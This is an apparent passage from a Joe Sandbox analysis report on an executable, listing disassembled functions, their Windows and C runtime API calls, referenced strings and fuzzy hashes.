___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BE16C9
SetLastError.KERNEL32(00000000,?,00BE168B,00BDF0E2), ref: 00BE171B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6711357e8da1a973de9d5f4988a67de259f8bf0ae001a1d296b07be8015409b6
Instruction ID: e6b896ea22ef08f5e53b7824b250857aa2964eefa7742478df33aaa561792894
Opcode Fuzzy Hash: 6711357e8da1a973de9d5f4988a67de259f8bf0ae001a1d296b07be8015409b6
Instruction Fuzzy Hash: 3001DF373092916EA7292F7B7C8A93A2BE9EF417717300ABAF514870E2EF614C01F144

Function 00BDD2D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 00BDD2FF
ReleaseSRWLockExclusive, xrefs: 00BDD30F
KERNEL32.DLL, xrefs: 00BDD2EA

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: a69ddd7f69085183462a545f97aa70995b2c9f43c8ed6a709e6406930b03b5ef
Instruction ID: 2bc2d5da2cd7fc6476a384bed8aea801ea499cb818e05a47328ec0c9ad1cdc41
Opcode Fuzzy Hash: a69ddd7f69085183462a545f97aa70995b2c9f43c8ed6a709e6406930b03b5ef
Instruction Fuzzy Hash: B401D1B62422229B4F214FB59C906EBABD4EA0272131001FBE681E3360FB50C846D7A5

Function 00BD0938 Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00BD0996

Part of subcall function 00BCAA39: GetVersionExW.KERNEL32(?), ref: 00BCAA5E

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BD09B8
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BD09D2
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BD09E3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BD09F3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BD09FF

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: dcff29cd7d37a836b12b15777d6bc51a51c745e4cd9d499bff9197dadcf78da9
Instruction ID: 3b6473280d9077c0cfd3b97acd38bac925b13e3da7af20e2ec4bec0f7bc6be19
Opcode Fuzzy Hash: dcff29cd7d37a836b12b15777d6bc51a51c745e4cd9d499bff9197dadcf78da9
Instruction Fuzzy Hash: D531D77A1183469BC704EFA9D8809ABB7E8FF98704F04495EF995D3210EB30D549CB6A

Function 00BD8C4D Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00BD8C71
_memcmp.LIBVCRUNTIME ref: 00BD8C88

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 0488bb49a0407ed50305fb1e21de52a166e426f0bca2918af8dc4eafec2c6aa6
Instruction ID: 76be82c61f049e1e7e3b5d29708bbd956abb2b1015360d692e0de253ac743e83
Opcode Fuzzy Hash: 0488bb49a0407ed50305fb1e21de52a166e426f0bca2918af8dc4eafec2c6aa6
Instruction Fuzzy Hash: DC218E7160410AEBDB149A20CC81E3BF7EDEB60759B1585BBFD059B351FB20ED4582A4

Function 00BE8571 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BE33F4,?,?,?,00BE2E6F,00000050), ref: 00BE8575
_free.LIBCMT ref: 00BE85A8
_free.LIBCMT ref: 00BE85D0
SetLastError.KERNEL32(00000000), ref: 00BE85DD
SetLastError.KERNEL32(00000000), ref: 00BE85E9
_abort.LIBCMT ref: 00BE85EF

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: f0867f353fb327945a336566706b20f77384c621243f02a0acca45d36e727b2e
Instruction ID: cca44aa211a77264b0ee3b6ea90631103fe72a57580e542cab439b590405df40
Opcode Fuzzy Hash: f0867f353fb327945a336566706b20f77384c621243f02a0acca45d36e727b2e
Instruction Fuzzy Hash: E4F0A436184A803BD616733BBC0AE6F25D6DBE1722B3501A5F91CE32A2EF248A01C160

Function 00BDC2FD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00BC12D7: GetDlgItem.USER32(00000000,00003021), ref: 00BC131B
Part of subcall function 00BC12D7: SetWindowTextW.USER32(00000000,00BF22E4), ref: 00BC1331

EndDialog.USER32(?,00000001), ref: 00BDC348
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BDC35E
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BDC378
SetDlgItemTextW.USER32(?,00000068), ref: 00BDC383

Strings

RENAMEDLG, xrefs: 00BDC315

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 1b0ccc438425287d063afd0a6c63747bac03f8eb7ac5ea3ac19f0935e2ff2f8f
Instruction ID: 64541c9214b806c102452aca59451ec8badcb04cf27a33abdf90a7ac51af0352
Opcode Fuzzy Hash: 1b0ccc438425287d063afd0a6c63747bac03f8eb7ac5ea3ac19f0935e2ff2f8f
Instruction Fuzzy Hash: 2301F53268431676D2105A285D44F7BBFACEB97B21F008156F341B7290D6A1AC04D769

Function 00BE6B9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BE6B4F,00000003,?,00BE6AEF,00000003,00BFA8C8,0000000C,00BE6C46,00000003,00000002), ref: 00BE6BBE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BE6BD1
FreeLibrary.KERNEL32(00000000,?,?,?,00BE6B4F,00000003,?,00BE6AEF,00000003,00BFA8C8,0000000C,00BE6C46,00000003,00000002,00000000), ref: 00BE6BF4

Strings

CorExitProcess, xrefs: 00BE6BC9
mscoree.dll, xrefs: 00BE6BB7

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bf79f28656520dd9d2dec7dac29c16e1bc36172eb571da959492eb96b41280fa
Instruction ID: 8eb6f9f38ae1999e8e9b58220342d045f044f07a353b51a35e06ea62cc8c3ff4
Opcode Fuzzy Hash: bf79f28656520dd9d2dec7dac29c16e1bc36172eb571da959492eb96b41280fa
Instruction Fuzzy Hash: 18F04F31A0520DBBCB159BA1DC09FAEBFF8EB04755F0000A5F909E7160DF709E44DA90

Function 00BCE819 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BCFD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BCFD31
Part of subcall function 00BCFD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BCE82C,Crypt32.dll,?,00BCE8AE,?,00BCE892,?,?,?,?), ref: 00BCFD53

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BCE838
GetProcAddress.KERNEL32(00C07350,CryptUnprotectMemory), ref: 00BCE848

Strings

CryptProtectMemory, xrefs: 00BCE832
CryptUnprotectMemory, xrefs: 00BCE83E
Crypt32.dll, xrefs: 00BCE822

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 48441c9c6e4e8c85363ef82cb5273902fe4429528e1bb39ea38bdbe52dbc40f5
Instruction ID: 71f4ac3063e58015964d5a4118af612159924f6c41ffa4495372b7cdd2a1c894
Opcode Fuzzy Hash: 48441c9c6e4e8c85363ef82cb5273902fe4429528e1bb39ea38bdbe52dbc40f5
Instruction Fuzzy Hash: 73E046B1502A4BFBDB005B74A808B21FBE4BB10710F10C1AAB224D36A0EFB4D0A4CB60

Function 00BE73AF Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE7421
_free.LIBCMT ref: 00BE7441

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 25341ec826e315f57a44bdcaa5616e942916b2878d042e66b9ff69f2f1817b8c
Instruction ID: 095b2a40d88f00e3742bc3fbf06c98044cea5bcf3e1de454d5d106558fad1ac1
Opcode Fuzzy Hash: 25341ec826e315f57a44bdcaa5616e942916b2878d042e66b9ff69f2f1817b8c
Instruction Fuzzy Hash: A441C236A40250AFCB24DF7AC881A6DB7F5EF85324B2545A9E515EB391EB31ED01CB80

Function 00BEAC01 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BEAC0A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BEAC2D

Part of subcall function 00BE7B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BE3006,?,0000015D,?,?,?,?,00BE44E2,000000FF,00000000,?,?), ref: 00BE7B32

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BEAC53
_free.LIBCMT ref: 00BEAC66
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BEAC75

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: b296fc6a9a9e18c8872073983e1bd1324b3806571cdea5ac4639eba5328d8153
Instruction ID: 9920c054a885e3bad00e6856f52546cbf9230b90e6c082da326a3432b183883d
Opcode Fuzzy Hash: b296fc6a9a9e18c8872073983e1bd1324b3806571cdea5ac4639eba5328d8153
Instruction Fuzzy Hash: 510171726056957B2321567B6CCCC7B6EADDAC6FA032501A9F904D3341DF619D0181F2

Function 00BE85F5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00BE7F47,00BE7BE3,?,00BE859F,00000001,00000364,?,00BE33F4,?,?,?,00BE2E6F,00000050), ref: 00BE85FA
_free.LIBCMT ref: 00BE862F
_free.LIBCMT ref: 00BE8656
SetLastError.KERNEL32(00000000), ref: 00BE8663
SetLastError.KERNEL32(00000000), ref: 00BE866C

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: af0990a5c49ac4707c72263d474b26007ede3a05082b2e1c342f860aa0896326
Instruction ID: a275314f4e35087a6234f88bdb2b133ae2b3f9f2966f285beb1d217443b13484
Opcode Fuzzy Hash: af0990a5c49ac4707c72263d474b26007ede3a05082b2e1c342f860aa0896326
Instruction Fuzzy Hash: AB01D136144E807FD316B73B6C89D2A22D9EBD236272101A4F41D93252EF248C019028

Function 00BD03DE Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00BD06B1: ResetEvent.KERNEL32(?,?,00BD0400,?,?,?,?,00BF146D,000000FF,?,00BCA6B6,?,?,?,00BF146D,000000FF), ref: 00BD06D1
Part of subcall function 00BD06B1: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,00BF146D,000000FF,?,00BCA6B6,?,?,?,00BF146D,000000FF), ref: 00BD06E5

ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 00BD0412
CloseHandle.KERNEL32(?,?), ref: 00BD042C
DeleteCriticalSection.KERNEL32(?), ref: 00BD0445
CloseHandle.KERNEL32(?), ref: 00BD0451
CloseHandle.KERNEL32(?), ref: 00BD045D

Part of subcall function 00BD04D4: WaitForSingleObject.KERNEL32(?,000000FF,00BD06F6,?,?,?,?,00BF146D,000000FF,?,00BCA6B6,?,?,?,00BF146D,000000FF), ref: 00BD04DA
Part of subcall function 00BD04D4: GetLastError.KERNEL32(?,?,?,?,00BF146D,000000FF,?,00BCA6B6,?,?,?,00BF146D,000000FF), ref: 00BD04E6

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: fe3c7e8dbe83da7716b76c2f3bf82e3f0b6388f0afe696da77026e9f751e2be6
Instruction ID: 9bcf33152cc27014b6f18d064b95d39267272aaf3eeeb32d8058bd51a6a887e8
Opcode Fuzzy Hash: fe3c7e8dbe83da7716b76c2f3bf82e3f0b6388f0afe696da77026e9f751e2be6
Instruction Fuzzy Hash: 51018C32100A00EBD721AB68DC44F96FBFAFB45710F00456AF29A83660DF752844DB50

Function 00BEB4BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BEB4D4

Part of subcall function 00BE7AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?), ref: 00BE7ADC
Part of subcall function 00BE7AC6: GetLastError.KERNEL32(?,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?,?), ref: 00BE7AEE

_free.LIBCMT ref: 00BEB4E6
_free.LIBCMT ref: 00BEB4F8
_free.LIBCMT ref: 00BEB50A
_free.LIBCMT ref: 00BEB51C

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3809ab74adf154802e11ab3054a1b61e8295e28a7b31de7a7c17853aef15ab48
Instruction ID: 1cb16a93c41b90295b9e57cece3b31e7b21f049196b816544ac475669acf0bce
Opcode Fuzzy Hash: 3809ab74adf154802e11ab3054a1b61e8295e28a7b31de7a7c17853aef15ab48
Instruction Fuzzy Hash: 38F03636544280B78630EB5AF98AC2B77EEFB007107585C95F059D7662CF34FD80C654

Function 00BE7601 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE761F

Part of subcall function 00BE7AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?), ref: 00BE7ADC
Part of subcall function 00BE7AC6: GetLastError.KERNEL32(?,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?,?), ref: 00BE7AEE

_free.LIBCMT ref: 00BE7631
_free.LIBCMT ref: 00BE7644
_free.LIBCMT ref: 00BE7655
_free.LIBCMT ref: 00BE7666

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3a98bee64791b87012596804ac7cb41b5742a05dc145c3edee61864e164cd536
Instruction ID: be26fae761d3cd45e089186029468e2e06be7f50ed2716575859682a9e170400
Opcode Fuzzy Hash: 3a98bee64791b87012596804ac7cb41b5742a05dc145c3edee61864e164cd536
Instruction Fuzzy Hash: 6FF09A71864268AB8631FF1ABC01B2E3BE5F70571032A51A7F02057AB7CF340A02EBC1

Function 00BE6C99 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\YyVnwn8Zst.exe,00000104), ref: 00BE6CD9
_free.LIBCMT ref: 00BE6DA4
_free.LIBCMT ref: 00BE6DAE

Strings

C:\Users\user\Desktop\YyVnwn8Zst.exe, xrefs: 00BE6CD0, 00BE6CD7, 00BE6D06, 00BE6D3E

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\YyVnwn8Zst.exe
API String ID: 2506810119-3398392515
Opcode ID: d810c684538a38fed7d60304a0dc139ab2b6a78e48ca0e9ac82a21744d823f15
Instruction ID: 3fb332f662be62f1fe93a792389371df19886dd8fdef42460dc0c1719f876a30
Opcode Fuzzy Hash: d810c684538a38fed7d60304a0dc139ab2b6a78e48ca0e9ac82a21744d823f15
Instruction Fuzzy Hash: 0B318F71A04298AFDB21DF9A9C85A9EBBFCEB95350F6080E6F80497251D7708E41CB91

Function 00BC74AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC74B1

Part of subcall function 00BC3AAF: __EH_prolog.LIBCMT ref: 00BC3AB4

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00BC7578

Part of subcall function 00BC7B08: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BC7B17
Part of subcall function 00BC7B08: GetLastError.KERNEL32 ref: 00BC7B5D
